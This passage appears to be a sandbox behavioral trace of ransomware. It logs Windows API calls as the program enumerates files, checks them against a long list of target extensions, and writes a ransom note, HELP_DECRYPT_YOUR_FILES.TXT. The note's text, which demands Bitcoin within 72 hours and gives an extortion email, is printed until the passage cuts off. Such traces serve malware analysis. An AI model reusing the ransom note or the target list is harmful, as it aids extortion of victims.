	[0171.153] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.153] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\downloader\\*.*", lpSrch="packages") returned 0x0
	[0171.153] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.154] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\downloader\\*.*", lpSrch="cookies") returned 0x0
	[0171.154] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.154] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\downloader\\*.*", lpSrch="programdata") returned 0x0
	[0171.154] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe06db82a, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xe06db82a, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0171.154] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe06db82a, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xe06db82a, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x6a32e5dd, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x0, cFileName="qmgr0.dat", cAlternateFileName="")) returned 1
	[0171.154] lstrcmpW (lpString1="qmgr0.dat", lpString2="..") returned 1
	[0171.154] lstrcmpW (lpString1="qmgr0.dat", lpString2=".") returned 1
	[0171.155] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\") returned="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\"
	[0171.155] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\", lpString2="qmgr0.dat" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr0.dat") returned="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr0.dat"
	[0171.155] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr0.dat") returned 57
	[0171.155] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0171.155] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr0.dat", cchLength=0x39 | out: lpsz="c:\\users\\all users\\microsoft\\network\\downloader\\qmgr0.dat") returned 0x39
	[0171.155] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.155] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\downloader\\qmgr0.dat", lpSrch="help_decrypt_your_files") returned 0x0
	[0171.156] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\all users\\microsoft\\network\\downloader\\qmgr0.dat" | out: lpString1="c:\\users\\all users\\microsoft\\network\\downloader\\qmgr0.dat") returned="c:\\users\\all users\\microsoft\\network\\downloader\\qmgr0.dat"
	[0171.156] lstrlenW (lpString="c:\\users\\all users\\microsoft\\network\\downloader\\qmgr0.dat") returned 57
	[0171.156] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0171.156] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.156] StrStrW (lpFirst=".dat", lpSrch=".") returned=".dat"
	[0171.156] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.157] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".dat") returned=".dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0171.157] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0171.157] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0171.157] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\network\\downloader\\qmgr0.dat" (normalized: "c:\\users\\all users\\microsoft\\network\\downloader\\qmgr0.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0171.158] CloseHandle (hObject=0xffffffff) returned 1
	[0171.158] CloseHandle (hObject=0xffffffff) returned 1
	[0171.158] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe06db82a, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xe06db82a, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x6b1c0120, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x0, cFileName="qmgr1.dat", cAlternateFileName="")) returned 1
	[0171.158] lstrcmpW (lpString1="qmgr1.dat", lpString2="..") returned 1
	[0171.158] lstrcmpW (lpString1="qmgr1.dat", lpString2=".") returned 1
	[0171.159] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\") returned="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\"
	[0171.159] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\", lpString2="qmgr1.dat" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr1.dat") returned="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr1.dat"
	[0171.159] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr1.dat") returned 57
	[0171.159] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0171.159] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr1.dat", cchLength=0x39 | out: lpsz="c:\\users\\all users\\microsoft\\network\\downloader\\qmgr1.dat") returned 0x39
	[0171.159] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.159] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\downloader\\qmgr1.dat", lpSrch="help_decrypt_your_files") returned 0x0
	[0171.159] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\all users\\microsoft\\network\\downloader\\qmgr1.dat" | out: lpString1="c:\\users\\all users\\microsoft\\network\\downloader\\qmgr1.dat") returned="c:\\users\\all users\\microsoft\\network\\downloader\\qmgr1.dat"
	[0171.160] lstrlenW (lpString="c:\\users\\all users\\microsoft\\network\\downloader\\qmgr1.dat") returned 57
	[0171.160] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0171.160] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.160] StrStrW (lpFirst=".dat", lpSrch=".") returned=".dat"
	[0171.160] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.160] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".dat") returned=".dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0171.161] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0171.161] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0171.161] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\network\\downloader\\qmgr1.dat" (normalized: "c:\\users\\all users\\microsoft\\network\\downloader\\qmgr1.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0171.162] CloseHandle (hObject=0xffffffff) returned 1
	[0171.162] CloseHandle (hObject=0xffffffff) returned 1
	[0171.162] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe06db82a, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xe06db82a, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x6b1c0120, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x0, cFileName="qmgr1.dat", cAlternateFileName="")) returned 0
	[0171.162] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0171.162] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0171.163] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Network\\Downloader" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Network\\Downloader") returned="C:\\Users\\All Users\\Microsoft\\Network\\Downloader"
	[0171.163] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Network\\Downloader", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\*.*"
	[0171.163] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0171.163] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0171.163] wsprintfW (in: param_1=0x18a370, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\HELP_DECRYPT_YOUR_FILES.TXT") returned 75
	[0171.163] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\network\\downloader\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0171.165] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: 